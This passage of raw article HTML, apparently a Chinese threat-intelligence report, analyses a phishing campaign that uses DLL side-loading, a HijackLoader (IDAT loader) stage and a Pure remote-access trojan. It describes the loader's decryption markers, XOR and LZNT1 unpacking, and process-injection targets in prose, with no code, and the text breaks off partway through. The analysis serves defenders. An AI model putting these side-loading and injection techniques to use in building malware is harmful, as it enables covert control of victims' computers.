SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 二、攻击流程分析 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024084" class="rich_pages wxw-img" data-ratio="0.6422222222222222" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=ac2de5c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFURibZ9Bmiau2l8ibnt4k3RqhrITXtB7Y5sNp3cNiaLmsVFPwLJHkW4mo4w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><span textstyle="" style="font-size: 15px;">图1  攻击流程示意</span></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">攻击者使用“白加黑”的方法依次加载两个恶意dll文件，再将数据文件中的Hijackloader解密和解压缩出来，注入到合法PE文件中并执行，最终加载Pure远程控制木马，实现对受害者计算机的控制。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">1. </span><span leaf="">载荷投递</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">本次攻击活动中的钓鱼手法与过往相比没有变化，仍然使用SVG文件作为诱饵，向目标发送包含这个附件的钓鱼邮件。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">受害者点击链接后下载压缩包Demanda por daños y perjuicios – Juzgado 49，解压后文件夹内包含6个文件，其中的02 PROCESO JUDICIAL.exe和MSVCR100.dll为合法应用程序和动态链接库，python34.dll和VideoUploader.dll为恶意PE文件，通过执行exe来依次加载两个dll；Rookcrung.eh和Vind.wt为加密的恶意载荷文件。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024050" class="rich_pages wxw-img" data-ratio="0.27111111111111114" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=32b25da0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxvSa3d7EaupSLn1z8iafJ2seMmAb9qANVJDMEzbbTrENbAZQSLfWglqg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图2  解压缩后的文件夹内的文件</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">受害者点击exe文件开始执行后，首先加载videouploader.dll，再通过LoadLibrary加载python34.dll，而后进入python34.dll继续执行。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024051" class="rich_pages wxw-img" data-ratio="0.2822222222222222" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=429c674f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxT3HNibuY1LYE0o7ibjSg3b4DQnXGP7zKIicsvVibm5K2SucPoyMtXdMpFA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图3  从videouploader.dll中加载python34.dll</span></span></span></p></div></div><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在python34.dll中，首先从kernel32.dll中导入多个函数地址，以备后续操作中使用。然后读取文件RookCrung.eh, 调用VirtualProtect更改vssapi.dll读/写/执行属性后，挖空并注入从文件中解密出的恶意载荷。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024052" class="rich_pages wxw-img" data-ratio="0.44666666666666666" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=7f380b9c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxmkKicWa7hLGxLlhxiaH6NjCkR9whnPheyeLv24YPoERjPoEic39I64aPg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图4  向vssapi.dll中注入解密后的RookCrung.eh</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在vssapi.dll中，首先将Vind.wt文件中的内容解密和解压，得到Hijackloader。解密该文件时使用了如下方法：检索加密文件中的“????IDAT”字符模式进行匹配（这也是该loader又被称作IDAT loader的原因），找到该模式后检查紧随其后的四字节内容是否为C6 A5 79 EA，若是则对其后的数据进行异或运算解密。接下来的八字节为密钥和数据长度。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024053" class="rich_pages wxw-img" data-ratio="0.6685205784204672" data-type="png" data-w="899" src="https://wechat2rss.xlab.app/img-proxy/?k=acbf7bfe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxV0nK8mfef1QgibdI1Fz2zI4XvicwtINlCswS4Px2CxB9h4LXSVjNrumA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图5  查找解压位置并解密</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024054" class="rich_pages wxw-img" data-ratio="0.3388888888888889" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=62bb0921&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxgTfHF5MblbjL40N5fjL2obf6RnCuN7JBDOic9xZY1RpDIv5ibAp85LKg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图6  加密数据的结构</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024055" class="rich_pages wxw-img" data-ratio="0.5711111111111111" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=076ee93a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxMMVjJl3truG8IFkVEUNfJNg4f550E5sQw5KlaaM0RO9brcYbY2MzQQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图7  载荷解密过程</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">解压时间接调用了ntdll.RtlDecompressBuffer，使用LZNT1解压算法实现。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024056" class="rich_pages wxw-img" data-ratio="0.698019801980198" data-type="png" data-w="606" src="https://wechat2rss.xlab.app/img-proxy/?k=26867457&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZx8BV8BuVWmdqCAtxkYG1GqUzIvRsUWaxSHmKKYggHrXKK0ZMsVzHPtw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024057" class="rich_pages wxw-img" data-ratio="0.6870860927152318" data-type="png" data-w="604" src="https://wechat2rss.xlab.app/img-proxy/?k=11b20cb3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxRribmGqGg6xCVTaX18lRuvDw5kpza4l6McvHiaYoffiaWemvrZmpib20XA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024058" class="rich_pages wxw-img" data-ratio="0.9537953795379538" data-type="png" data-w="606" src="https://wechat2rss.xlab.app/img-proxy/?k=a90e98c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZx4O4O8VfkJf22xViaIEQhwTR910BSZwpcvVbribwV195xa8RnLJdyfib5Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图8  解密和解压后的文件包含了下一步注入的目录、文件名及其可执行文件，以及各功能模块名及其配置</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024059" class="rich_pages wxw-img" data-ratio="0.4722222222222222" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=d941a56b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxcuaIT6iaq3Pk0KpMcWNiaiaCaKGgmaud9hibgtibDWFN8gunicBP9ZRojSow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图9  解密和解压缩Vind.wt</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024060" class="rich_pages wxw-img" data-ratio="0.4533333333333333" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=b731c9ce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxgBibW8WdImBvv6n0hmXsIRHZiaBmR5QbXshp1mspNEzKzJ0jiaIz7GFnw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图10  通过计算和比对哈希查找所需要的模块，将其注入pla.dll的.text节中开始执行</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2. 载荷加载</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该loader包含了多达35个功能模块。这些模块包含了配置信息（待注入目录、文件名、杀毒软件名称等）、后续注入的完整的PE文件或shellcode等。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024061" class="rich_pages wxw-img" data-ratio="2.2619469026548673" data-type="png" data-w="565" src="https://wechat2rss.xlab.app/img-proxy/?k=f3dea30c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZx4ibM3pRpygxzay6Hl7ic15qAnroGnwdp72iaLRHXoFP4biaU8RslDibz15Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图11  提取出的35个功能模块</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, 